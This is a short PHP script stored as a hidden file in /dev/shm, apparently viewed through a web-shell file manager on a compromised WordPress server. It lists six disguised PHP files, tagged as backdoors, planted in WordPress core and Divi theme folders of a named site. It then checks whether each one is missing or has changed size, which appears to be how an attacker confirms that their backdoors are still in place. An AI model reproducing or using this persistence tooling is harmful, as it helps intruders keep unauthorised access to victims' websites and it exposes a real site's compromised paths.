Viewing File: /dev/shm/.ptr

<?php   $r = '/home/tranlxes/adeolumide.ca'; $x = ["/wp-includes/blocks/code/Strip.php"=>"bd@@1137669@@826",
"/wp-content/themes/comment_section_1757852844/4O4.php"=>"bd@@461139@@967",
"/wp-content/themes/Divi/includes/builder/module/field/template/border/mod_acymailing.php"=>"bd@@311635@@647",
"/wp-content/themes/search_template_1748080468/paqe.php"=>"bd@@308095@@727",
"/wp-content/themes/Divi/includes/builder/tests/codeception/wpunit/ImageManager.php"=>"bd@@368334@@570",
"/wp-content/themes/Divi/includes/builder/module/helpers/motion/jpgraph_ttf.inc.php"=>"bd@@337386@@2107"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager